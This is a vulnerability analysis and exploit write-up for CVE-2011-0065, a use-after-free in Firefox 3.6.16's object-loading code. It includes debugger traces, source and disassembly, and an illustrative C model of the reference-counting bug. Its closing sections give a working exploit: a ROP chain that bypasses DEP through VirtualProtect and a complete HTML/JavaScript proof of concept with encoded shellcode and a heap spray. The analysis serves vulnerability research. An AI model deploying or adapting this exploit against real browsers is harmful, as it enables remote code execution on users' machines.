CVE-2011-0065 - Mozilla Firefox 3.6.16 mChannel use-after-free vulnerability


Author: instruder of Code Audit Labs of vulnhunt.com
Time: 2011/8/19

1 Affected Products

Software version: Mozilla Firefox 3.6.16

CVE ID: CVE-2011-0065

 

2 Vulnerability Details

In Firefox 3.6.16 the mChannel object can be freed through the OnChannelRedirect method. Once it is freed, mChannel is left as a dangling pointer, and after the script finishes executing it is used again by mChannel->Cancel(NS_BINDING_ABORTED); inside nsObjectLoadingContent::LoadObject, which results in a use-after-free vulnerability.

 

 

3 Crash info

    (a78.d94): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0a0e3060 ebx=07ccc184 ecx=0a19f000 edx=0566a100 esi=804b0002 edi=80000000
    eip=00857c64 esp=0013f714 ebp=0013f8cc iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    <Unloaded_Ed20.dll>+0x857c63:
    00857c64 2003            and     byte ptr [ebx],al          ds:0023:07ccc184=50
    0:000> kb
    ChildEBP RetAddr  Args to Child
    WARNING: Frame IP not in any known module. Following frames may be wrong.
    0013f710 1080df8e 0a0e3060 804b0002 00000000 <Unloaded_Ed20.dll>+0x857c63
    0013f8cc 1080e720 07ccc184 0858aab0 00000001 xul!nsObjectLoadingContent::LoadObject+0x108 [e:\builds\moz2_slave\win32_build\build\content\base\src\nsobjectloadingcontent.cpp @ 1081]
    0013f8fc 1080eadc 07ccc184 0013f9b4 00000001 xul!nsObjectLoadingContent::LoadObject+0xcd [e:\builds\moz2_slave\win32_build\build\content\base\src\nsobjectloadingcontent.cpp @ 986]
    0013faa0 1080eb2a 07ccc160 00000001 10190b32 xul!nsHTMLObjectElement::StartObjectLoad+0x84 [e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlobjectelement.cpp @ 456]
    0013faac 10190b32 00000001 09bcc600 09bcc600 xul!nsHTMLObjectElement::DoneAddingChildren+0x17 [e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlobjectelement.cpp @ 174]
    0013fac8 10191b42 00000048 00000000 00000000 xul!SinkContext::CloseContainer+0xd2 [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 1018]
    0013fadc 100d873e 07ce80b8 00000048 00000000 xul!HTMLContentSink::CloseContainer+0x32 [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 2392]
    0013faf4 100d8501 00000048 00000000 09bcc600 xul!CNavDTD::CloseContainer+0x5e [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 2762]
    0013fb24 100d8418 00000002 00000048 00000000 xul!CNavDTD::CloseContainersTo+0xd1 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 2812]
    0013fb3c 1005c8f3 00000048 00000000 05261800 xul!CNavDTD::CloseContainersTo+0x38 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 2954]
    0013fb58 1005c857 09bcc600 00000000 05261800 xul!CNavDTD::DidBuildModel+0x69 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\cnavdtd.cpp @ 397]
    0013fb70 100c1284 00000000 05261800 05261804 xul!nsParser::DidBuildModel+0x42 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @ 1611]
    0013fb94 10042d6e 00000001 00000001 00000001 xul!nsParser::ResumeParse+0x124 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @ 2381]
    0013fbb8 10042cdc 05261804 052e88ac 00000000 xul!nsParser::OnStopRequest+0x82 [e:\builds\moz2_slave\win32_build\build\parser\htmlparser\src\nsparser.cpp @ 3029]
    0013fbd8 1001e6f2 05261804 052e88ac 00000000 xul!nsDocumentOpenInfo::OnStopRequest+0x56 [e:\builds\moz2_slave\win32_build\build\uriloader\base\nsuriloader.cpp @ 324]
    0013fbfc 100786f1 052e88ac 0529a920 00000000 xul!nsBaseChannel::OnStopRequest+0x55 [e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsbasechannel.cpp @ 681]
    0013fc1c 10070fd1 0081d560 056dd670 00817400 xul!nsInputStreamPump::OnStateStop+0x3f [e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsinputstreampump.cpp @ 577]
    0013fc30 10035121 0529a924 07410b08 056dd660 xul!nsInputStreamPump::OnInputStreamReady+0x4c [e:\builds\moz2_slave\win32_build\build\netwerk\base\src\nsinputstreampump.cpp @ 402]
    0013fc40 100f4380 056dd660 0081d560 0013ff34 xul!nsOutputStreamReadyEvent::Run+0x1d [e:\builds\moz2_slave\win32_build\build\xpcom\io\nsstreamutils.cpp @ 192]
    0013fc68 100cf5ca 056dd660 00000001 0013fc88 xul!nsThread::ProcessNextEvent+0x230 [e:\builds\moz2_slave\win32_build\build\xpcom\threads\nsthread.cpp @ 527]

PS: For detailed debugging you can download the Firefox symbols, or build the source yourself (rather troublesome; I never got the debug build to compile). For example, set the symbol path like this:

    SRV*e:\symcache\*http://msdl.microsoft.com/download/symbols;SRV*e:\symcache\*http://symbols.mozilla.org/firefox


4 Analysis

Working from the crash stack above, restart windbg and set the following breakpoints:

    0:000> bl
     0 e 10499052     0001 (0001)  0:**** xul!nsObjectLoadingContent::OnChannelRedirect
    0:000> bp xul!nsObjectLoadingContent::LoadObject
    Matched: 1080e653 xul!nsObjectLoadingContent::LoadObject (class nsAString_internal *, int, class nsCString *, int)
    Matched: 1080de86 xul!nsObjectLoadingContent::LoadObject (class nsIURI *, int, class nsCString *, int)
    Ambiguous symbol error at 'xul!nsObjectLoadingContent::LoadObject'
    0:000> bp 1080e653
    0:000> bp 1080de86

PoC sample:

    <html><body><object id="d"><object>
    <script type="text/javascript">
    var e;
    e=document.getElementById("d");
    e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);
    e.data = ""; // not actually needed: the trigger happens after the script finishes (PS: that is what testing showed :)
    </script></body></html>

Run the PoC sample. windbg breaks in the onChannelRedirect function:

    Breakpoint 1 hit
    eax=00000003 ebx=0013ef98 ecx=052e9018 edx=109f5228 esi=051c5718 edi=00000000
    eip=10499052 esp=0013eca8 ebp=0013ecc8 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    xul!nsObjectLoadingContent::OnChannelRedirect:
    10499052 8b4c2408        mov     ecx,dword ptr [esp+8] ss:0023:0013ecb0=00000000
    0:000> dd esp+8
    0013ecb0  00000000 057369f0 00000000 00897640   // 1st argument null, 2nd argument new Object, 3rd argument 0; remember 057369f0, it comes up again later
    0013ecc0  00000000 0013ef68 0013ef68 10129438
    0013ecd0  052e9018 00000003 00000003 0013ed80
    0013ece0  005092f0 054f9c80 00000000 00379b06
    0013ecf0  06060b0c 00000000 030c0ecc 008af0e0
    0013ed00  06799403 051c5718 00379def 07122024
    0013ed10  052e9018 00000003 0013ed80 00000001
    0013ed20  087d1934 80570009 07dcd340 05736460

The assembly of this function:

    xul!nsObjectLoadingContent::OnChannelRedirect:
    10499052 8b4c2408        mov     ecx,dword ptr [esp+8]        // aOldChannel
    10499056 56              push    esi
    10499057 8b742408        mov     esi,dword ptr [esp+8]        // aNewChannel
    1049905b 3b4e1c          cmp     ecx,dword ptr [esi+1Ch]      // mChannel=0
    1049905e 7407            je      xul!nsObjectLoadingContent::OnChannelRedirect+0x15 (10499067)   // taken
    10499060 b802004b80      mov     eax,804B0002h
    10499065 eb1a            jmp     xul!nsObjectLoadingContent::OnChannelRedirect+0x2f (10499081)
    10499067 8b4624          mov     eax,dword ptr [esi+24h]  ds:0023:052e903c=00000000   // mClassifier
    1049906a 85c0            test    eax,eax
    1049906c 57              push    edi
    1049906d 8b7c2414        mov     edi,dword ptr [esp+14h]
    10499071 7408            je      xul!nsObjectLoadingContent::OnChannelRedirect+0x29 (1049907b)   // taken
    10499073 8b10            mov     edx,dword ptr [eax]
    10499075 57              push    edi
    10499076 51              push    ecx
    10499077 50              push    eax
    10499078 ff5210          call    dword ptr [edx+10h]
    1049907b 897e1c          mov     dword ptr [esi+1Ch],edi      // the new channel is written into mChannel

The corresponding source:

    NS_IMETHODIMP
    nsObjectLoadingContent::OnChannelRedirect(nsIChannel* aOldChannel,
                                             nsIChannel* aNewChannel,
                                             PRUint32    aFlags)
    {
      // If we're already busy with a new load, cancel the redirect
      if (aOldChannel != mChannel) {
        return NS_BINDING_ABORTED;
      }

      if (mClassifier) {
        mClassifier->OnRedirect(aOldChannel, aNewChannel);
      }

      mChannel = aNewChannel;
      return NS_OK;
    }

From this source it is clear that a new Object is used to replace mChannel, and that new Object is freed as soon as the JS call to onChannelRedirect returns (the JS call can be followed immediately by an allocation of the same size as the new Object, which then occupies the place of mChannel :).

Press F5 to continue. Firefox has two LoadObject functions. The one with the prototype nsresult nsObjectLoadingContent::LoadObject(nsIURI* aURI, PRBool aNotify, const nsCString& aTypeHint, PRBool aForceLoad) runs first; after it, execution goes to the one with the prototype nsresult nsObjectLoadingContent::LoadObject(const nsAString& aURI, PRBool aNotify, const nsCString& aTypeHint, PRBool aForceLoad), which in turn calls back into nsObjectLoadingContent::LoadObject(nsIURI* aURI, PRBool aNotify, const nsCString& aTypeHint, PRBool aForceLoad):

    nsresult
    nsObjectLoadingContent::LoadObject(nsIURI* aURI,
                                       PRBool aNotify,
                                       const nsCString& aTypeHint,
                                       PRBool aForceLoad)
    {
      .....
      // From here on, we will always change the content. This means that a
      // possibly-loading channel should be aborted.
      if (mChannel) {
        LOG(("OBJLC [%p]: Cancelling existing load\n", this));

        if (mClassifier) {
          mClassifier->Cancel();
          mClassifier = nsnull;
        }

        // These three statements are carefully ordered:
        // - onStopRequest should get a channel whose status is the same as the
        //   status argument
        // - onStopRequest must get a non-null channel
        mChannel->Cancel(NS_BINDING_ABORTED);   // exploit
        if (mFinalListener) {
          // NOTE: Since mFinalListener is only set in onStartRequest, which takes
          // care of calling mFinalListener->OnStartRequest, mFinalListener is only
          // non-null here if onStartRequest was already called.
          mFinalListener->OnStopRequest(mChannel, nsnull, NS_BINDING_ABORTED);
          mFinalListener = nsnull;
        }
        mChannel = nsnull;
      }
      .....
    }

The assembly:

    1080df61 837b5000        cmp     dword ptr [ebx+50h],0
    1080df65 7456            je      xul!nsObjectLoadingContent::LoadObject+0x137 (1080dfbd)
    1080df67 8d7358          lea     esi,[ebx+58h]
    1080df6a 8b06            mov     eax,dword ptr [esi]  ds:0023:052e903c=00000000
    1080df6c 85c0            test    eax,eax
    1080df6e 740f            je      xul!nsObjectLoadingContent::LoadObject+0xf9 (1080df7f)
    1080df70 8b08            mov     ecx,dword ptr [eax]
    1080df72 50              push    eax
    1080df73 ff5114          call    dword ptr [ecx+14h]
    1080df76 33d2            xor     edx,edx
    1080df78 8bce            mov     ecx,esi
    1080df7a e841da91ff      call    xul!nsCOMPtr_base::assign_with_AddRef (1012b9c0)
    1080df7f 8b4350          mov     eax,dword ptr [ebx+50h]
    1080df82 8b08            mov     ecx,dword ptr [eax]
    1080df84 be02004b80      mov     esi,804B0002h
    1080df89 56              push    esi
    1080df8a 50              push    eax
    1080df8b ff5118          call    dword ptr [ecx+18h]
    1080df8e 8d4b38          lea     ecx,[ebx+38h]
    1080df91 e85210b0ff      call    xul!nsCOMPtr<nsIPrefBranch>::operator nsIPrefBranch * (1030efe8)
    ....

Single-step log:

    0:000> t
    eax=0514f000 ebx=052e8fe4 ecx=08d1aad0 edx=054fee50 esi=052e9038 edi=80000000
    eip=1080df5b esp=0013f720 ebp=0013f8cc iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    xul!nsObjectLoadingContent::LoadObject+0xd5:
    1080df5b 0f84bf060000    je      xul!nsObjectLoadingContent::LoadObject+0x79a (1080e620) [br=0]
    0:000> t
    eax=0514f000 ebx=052e8fe4 ecx=08d1aad0 edx=054fee50 esi=052e9038 edi=80000000
    eip=1080df61 esp=0013f720 ebp=0013f8cc iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    xul!nsObjectLoadingContent::LoadObject+0xdb:
    1080df61 837b5000        cmp     dword ptr [ebx+50h],0 ds:0023:052e9034=057369f0   // check whether mChannel is 0
    0:000> dd 057369f0
    057369f0  00000000 00000000 00000000 00000000
    05736a00  00000000 00000000 00000000 00000000
    05736a10  00000007 05737e20 05742268 00000016
    05736a20  00000001 00000004 00353131 04cd63e0
    05736a30  6e6f6e61 756f6d79 06750073 054d8480
    05736a40  10a58be0 00000001 054cf288 00000016
    05736a50  00000007 05737f00 05742a48 00000016
    05736a60  00000001 00000001 054cf580 00000000
    0:000> t
    eax=0514f000 ebx=052e8fe4 ecx=08d1aad0 edx=054fee50 esi=052e9038 edi=80000000
    eip=1080df67 esp=0013f720 ebp=0013f8cc iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    xul!nsObjectLoadingContent::LoadObject+0xe1:
    1080df67 8d7358          lea     esi,[ebx+58h]
    0:000> t
    Breakpoint 5 hit
    eax=0514f000 ebx=052e8fe4 ecx=08d1aad0 edx=054fee50 esi=052e903c edi=80000000
    eip=1080df6a esp=0013f720 ebp=0013f8cc iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
    xul!nsObjectLoadingContent::LoadObject+0xe4:
    1080df6a 8b06            mov     eax,dword ptr [esi]  ds:0023:052e903c=00000000   // fetch mClassifier
    0:000> t
    Breakpoint 6 hit
    eax=00000000 ebx=052e8fe4 ecx=08d1aad0 edx=054fee50 esi=052e903c edi=80000000
    eip=1080df6e esp=0013f720 ebp=0013f8cc iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    xul!nsObjectLoadingContent::LoadObject+0xe8:
    1080df6e 740f            je      xul!nsObjectLoadingContent::LoadObject+0xf9 (1080df7f) [br=1]   // taken
    0:000> t
    Breakpoint 3 hit
    eax=00000000 ebx=052e8fe4 ecx=08d1aad0 edx=054fee50 esi=052e903c edi=80000000
    eip=1080df7f esp=0013f720 ebp=0013f8cc iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
    xul!nsObjectLoadingContent::LoadObject+0xf9:
    1080df7f 8b4350          mov     eax,dword ptr [ebx+50h] ds:0023:052e9034=057369f0
    0:000> dd 057369f0
    057369f0  00000000 00000000 00000000 00000000   // note: this address is the second argument of xul!nsObjectLoadingContent::OnChannelRedirect seen earlier; the Object has been freed
    05736a00  00000000 00000000 00000000 00000000
    05736a10  00000007 05737e20 05742268 00000016
    05736a20  00000001 00000004 00353131 04cd63e0
    05736a30  6e6f6e61 756f6d79 06750073 054d8480
    05736a40  10a58be0 00000001 054cf288 00000016
    05736a50  00000007 05737f00 05742a48 00000016
    05736a60  00000001 00000001 054cf580 00000000
    0:000> t
    (ff4.c50): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=057369f0 ebx=052e8fe4 ecx=00000000 edx=054fee50 esi=804b0002 edi=80000000
    eip=1080df8b esp=0013f718 ebp=0013f8cc iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
    xul!nsObjectLoadingContent::LoadObject+0x105:
    1080df8b ff5118          call    dword ptr [ecx+18h]  ds:0023:00000018=????????
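To make the lifetime problem in sections 2 and 4 concrete, here is an added C model; it is not Mozilla's code and does not reproduce the project's fix. It keeps only the shape the analysis exposes: a loader holding a channel pointer, a redirect handler that stores a caller-supplied channel, and a LoadObject step that later calls Cancel() through that pointer. The "raw" handler stores the pointer without taking a reference, so once the caller releases its temporary (the `new Object` in the PoC) the loader's pointer dangles; the "strong" handler does the nsCOMPtr-style AddRef/Release and keeps the object alive. To make the dangling use observable instead of a crash, released objects are poisoned (vtable zeroed, mirroring the all-zero dump at 057369f0 on the page) rather than handed back to the heap. All type and function names are constructed for this demo; NS_BINDING_ABORTED is the value read off the page's disassembly.

```c
#include <stdio.h>
#include <stdlib.h>

typedef unsigned int nsresult;
#define NS_OK               0x00000000u
#define NS_BINDING_ABORTED  0x804B0002u   /* constant seen in the disassembly above */

/* Constructed stand-in for nsIChannel: a vtable pointer first, like a COM object. */
typedef struct Channel Channel;
struct ChannelVtbl {
    nsresult (*Cancel)(Channel *self, nsresult status);
};
struct Channel {
    const struct ChannelVtbl *vtbl;   /* what `mov ecx,dword ptr [eax]` reads */
    int refcnt;
    nsresult cancel_status;           /* last status passed to Cancel() */
    int freed;                        /* poison flag, set when refcnt reaches zero */
};

static nsresult Channel_Cancel(Channel *self, nsresult status) {
    self->cancel_status = status;
    return NS_OK;
}
static const struct ChannelVtbl kChannelVtbl = { Channel_Cancel };

Channel *Channel_New(void) {
    Channel *c = calloc(1, sizeof *c);
    if (!c) abort();
    c->vtbl = &kChannelVtbl;
    c->refcnt = 1;
    return c;
}
void Channel_AddRef(Channel *c) { c->refcnt++; }
void Channel_Release(Channel *c) {
    if (--c->refcnt == 0) {   /* the real object would be deleted here */
        c->vtbl = NULL;       /* poison instead of free(), so a later use is visible */
        c->freed = 1;
    }
}

typedef struct {
    Channel *mChannel;
    int strong;   /* 1 = the loader owns a reference on mChannel */
} Loader;

/* Vulnerable shape: keep the caller's pointer without taking a reference. */
nsresult OnChannelRedirect_raw(Loader *l, Channel *aOld, Channel *aNew) {
    if (aOld != l->mChannel) return NS_BINDING_ABORTED;   /* same guard as the page's source */
    l->mChannel = aNew;
    return NS_OK;
}

/* Hardened shape: AddRef the incoming channel and Release the one it replaces. */
nsresult OnChannelRedirect_strong(Loader *l, Channel *aOld, Channel *aNew) {
    if (aOld != l->mChannel) return NS_BINDING_ABORTED;
    if (aNew) Channel_AddRef(aNew);
    if (l->mChannel) Channel_Release(l->mChannel);
    l->mChannel = aNew;
    return NS_OK;
}

/* The LoadObject fragment: abort a pending channel before the content changes.
 * Returns 0 on success, 1 if mChannel points at a released (poisoned) object,
 * which is the situation behind `call dword ptr [ecx+18h]` faulting on the page. */
int LoadObject_abort_pending(Loader *l) {
    Channel *c = l->mChannel;
    if (!c) return 0;
    if (c->freed || !c->vtbl) return 1;
    c->vtbl->Cancel(c, NS_BINDING_ABORTED);
    if (l->strong) Channel_Release(c);
    l->mChannel = NULL;
    return 0;
}

/* The script-driven sequence from the PoC: redirect onto a temporary object,
 * let the temporary go away, then let LoadObject run. */
int run_scenario(int strong) {
    Loader l = { NULL, strong };
    Channel *tmp = Channel_New();    /* the `new Object` handed to onChannelRedirect */
    nsresult rv = strong ? OnChannelRedirect_strong(&l, NULL, tmp)
                         : OnChannelRedirect_raw(&l, NULL, tmp);
    if (rv != NS_OK) return -1;
    Channel_Release(tmp);            /* the script's temporary is released after the call */
    int result = LoadObject_abort_pending(&l);
    free(tmp);                       /* demo cleanup: Release() never returned the block to the heap */
    return result;
}

int main(void) {
    printf("raw pointer  : %s\n", run_scenario(0) ? "Cancel() on released channel" : "ok");
    printf("strong ref   : %s\n", run_scenario(1) ? "Cancel() on released channel" : "ok");
    return 0;
}
```

The raw variant reports the use of a released object, the strong variant completes the Cancel() normally; swapping the poison for a real free() in Channel_Release turns the first case back into the access violation shown in the single-step log.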

5 Exploit

5.1 How to exploit

A new Object is passed as the second argument of onChannelRedirect so that it replaces mChannel. When the call returns, the new Object is freed, and an allocation of the same size made right afterwards takes its place as mChannel, like this:

    e = document.getElementById("d");
    e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
    fake_obj_addr = unescape("\x1c%u0c0c")

In this way 0c0c001c takes the place of the new Object; at address 1080df82, [eax]=0c0c001c. A large amount of memory is then allocated to cover address 0c0c0c0c, and after the script finishes, the call to LoadObject reaches call dword ptr [ecx+18h] at 1080df8b, which is what triggers execution of the shellcode.

 

5.2 DEP bypass

Since I did not find the ROP addresses from the original PoC, I put a lot of 'AAAAAAAAAA' in front of the sc variable in the PoC, debugged it myself, and found a ROP sequence.

ROP sequence (shell32.dll):

    7D66A4E8   8B49 0C         MOV ECX,DWORD PTR DS:[ECX+C]
    7D66A4EB   8B01            MOV EAX,DWORD PTR DS:[ECX]
    7D66A4ED   52              PUSH EDX
    7D66A4EE   51              PUSH ECX
    7D66A4EF   FF50 14         CALL DWORD PTR DS:[EAX+14]
    (a group of instructions a colleague taught me; very handy when doing ROP.)
    ====
    0x65e3ffae : # PUSH ECX # POP ESP # POP EBP (GR99D3~1.DLL)
    (found with the mona script in Immunity Debugger)
    ====
    5DDBC012   83C4 14               ADD ESP,14     (mshtml.dll)
    5DDBC015   C3                    RETN           // returns into the VirtualProtect function
    ====
    After VirtualProtect returns, execution continues at 0c0C0084, where the shellcode starts.


6 Vulnerability demo

 

7 POC

    <html><body><object id="d"><object>
    <script type="text/javascript">
    e = document.getElementById("d");
    e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)
    fake_obj_addr = unescape("\x1C%u0c0c") //%
    // taken and modified from adobe_flashplayer_newfunction.rb %u1a77%u3e43  65e3f263  7D66A4E8
    var sc = unescape("%u4141%u4141%u0028%u0c0c%uc012%u5ddb%u4141%u4141%ua4e8%u7d66%u4141%u4141%uffae%u65e3%u4141%u4141%u0028%u0c0c%u4141%u4141%u4141%u4141%u4141%u4141%u1ad4%u7c80%u0084%u0c0c%u0028%u0c0c%u0400%u0000%u0040%u0000%u0028%u0c0c%uf00d%ubeef%u4413%u7c87%u0048%u0c0c%u0c00%u0c0c%u0400%u0000%u0040%u0000%u7174%u7276%u8646%ub0fc%u677b%u85bf%ubed6%u4fa8%uf987%u109b%uebd1%u2425%u0591%u349f%u9892%u3c4b%u731d%u7c78%u0c75%u42b7%ub997%u4e8d%ue389%ua927%u437f%u1c93%ub596%ud53b%ub6b4%u7748%u3115%uc7fe%uf8c0%u492c%u354a%u90b3%ud422%u14b1%ue083%ufd03%u2ab2%u3fe2%uf588%uba99%u047a%u2fb8%u7947%u3d2d%u7679%ubb41%ubba9%ub6b5%u2c71%u93ba%u2173%u7de1%u983d%u3fb1%ub88d%u9937%u6b14%u2ff9%u9134%u664f%u9fa8%u277e%u7a4e%u0147%u25e2%u2b46%u0cfd%u1cb2%u3590%ub9b3%u1d77%uf680%u3cd6%ueb8c%u1240%u3af8%u2dd4%u677f%u7241%u087c%u33e0%u0dfc%u9b97%u4b96%uf51b%ue381%u0543%u7b70%u0474%u00b0%ub4d5%ub724%u4978%u4a75%u1592%u48bf%ube42%u7c99%u7714%u9142%u2cb7%u24be%u9b2d%u7d71%u7b7a%u663f%u4398%u7973%ud428%u3d70%ub2b5%u0592%ub347%ubb96%u34b8%ub44a%ub904%u3578%ufc18%u904f%u41a8%ue211%ue30a%ud01a%ud6d2%u8da9%u0c7f%u4627%u13bf%ud3f7%ub1f8%u4840%u3715%u9f97%u3c75%uf50b%ud539%u7293%u324b%u30eb%ub6f9%u1949%uc1ff%u25e1%ue029%ufd38%ub067%u4e1c%u1dba%u742f%u760d%u7c7e%u277d%u4273%ufd02%u2d79%ua99b%ub11d%u7598%uf803%u7f35%ue320%u3f43%ub8ba%u7b9f%uf52b%u7a92%ub42c%u3dbe%u7191%u7072%ub766%u1c2f%ubf15%ub367%ubbb9%ue084%u4a41%u8925%u0cf9%u7677%ufc13%ueb81%u0d46%u4f90%u2147%u78d6%u9914%ud469%u05b2%u3cb5%u88b6%u4be1%u4897%u8da8%u24b0%u3334%u4ed5%u4093%u7496%u4904%ue20a%u7e37%u277f%u70b5%ue201%ub034%u7974%u1c7b%ud480%u4a8d%ua9b3%ue08c%u777e%u7204%u9947%ud232%u0dfc%u3776%u247a%u0b2f%ue1d1%u413f%ub8b2%u391d%u4ff5%ub625%u752d%u2973%u91f8%u909f%u4b7c%ue308%uf712%uc0c6%u9bfd%ua8b7%u40b9%u6796%u052c%u7149%u9843%u3cb1%u1935%u78eb%u9366%u144e%ud530%u9215%ubf0c%ubb42%u487d%u3dbe%ub4ba%ud687%u1146%u97f9%ueb20%u7f74%u777d%u4079%u8d3c%u0c9f%u4292%ufd6b%u97ba%ud618%ub798%uf909%u78b6%u7375%ub447%u227b%u23e0%ue3c1%ub02f%u1d70%u0035%u02e1%ub9d4%u7c37%uf83a%ue228%u717a%ud51b%u1472%u9646%u4148%ufc3b%u3d0d%u913f%ub3b2%ubb67%u9905%u2576%u1566%u93a9%ubfb8%u4a90%u7ea8%ueb31%u8434%u4fe2%u1c7b%u7cbe%u754e%uf538%u277a%ud085%u10e3%ue1d3%u724b%u7f2c%u7604%u8343%ue0f6%u9b49%u2d78%u247e%ub1b5%u3d70%u992d%u714f%ubb25%u9f48%u8da8%u3c7d%ubf9b%u4234%u1473%u4a41%u77b2%u9015%ufd40%u374b%u921c%u793f%u2c24%u1dd5%u0493%ub6b8%u4727%ub3b4%ua9b9%u67b5%ubad6%ube46%u49b1%u7491%u2a05%u0cf8%u2f98%u0df5%u4e96%u1a97%ub0d4%u6635%uf986%ufcb7%udb43%ub8d7%u42b3%u12d2%u74d9%uf424%u295f%ub1c9%u3144%u1947%u4703%u8319%ufcef%ub751%uf90b%ue10e%udad8%u23c4%u91f3%u7553%ub13a%u0410%ub18c%ueb50%ub367%u7880%u3431%u0033%ucf9e%uc575%ud791%uc60c%ue977%ud73f%u8969%u4434%u6e4e%ud0c1%ue5b2%uf281%uf8b2%u88c3%ue309%ud598%u12ad%u0a75%u5d99%uf902%u5c69%u33fa%u6e91%uc8c2%u15c1%u4402%ud71d%ua84d%u1020%u47ba%ue219%u8018%ufb2b%u8aeb%ufaf7%u4c00%uf073%u1a9d%u15d9%uf620%u2155%u09a9%ua382%u2de9%ud54e%u9f32%u3c66%u6960%ub793%u024a%u86d2%u3f44%ufeb8%u40c7%u00c2%ufb7e%u4439%udcfe%uc9a0%uc079%u7c00%u776d%u7fb7%u0192%u880d%u7e04%ua8e2%u1695%u9ac9%u833b%uae45%u2e30%ud8e4%u94ea%u5002%u83f4%u37ed%ua2fc%ue8d0%u1c47%u4576%uda0b%u726b%u0d21%u85f2%u323a%u169d%u95bc%u817e%u415d%u131a%uc0f5%ue081%uea76%u8f92%u2824%u192f%u5837%u3977%ub997%u74ef%uff84%ueece%u6f58%ucf7c%u00f4%u2f52%ub762%u4ae2%u2b06%u5dc2%uff5e%u4e00%ue1d7%ubc78%ub2b5%u122b%ue5c6%u52fd%uf968%u5aab")
    var ret_addr = unescape("%u0024%u0c0c")
    while(ret_addr.length+20+8 < 0x100000-18-12-12-12) {
      ret_addr += ret_addr
    }
    var b = ret_addr.substring(0,(0x48-0x24)/2)
    b += sc
    b += ret_addr
    var next = b.substring(0,0x10000/2)
    while(next.length<0x800000) {
      next += next
    }
    var again = next.substring(0,0x80000 - (0x1020-0x08)/2)
    array = new Array()
    for (n=0;n<0x1f0;n++){
      array[n] = again + sc
    }
    e.data = ""
    </script></body></html>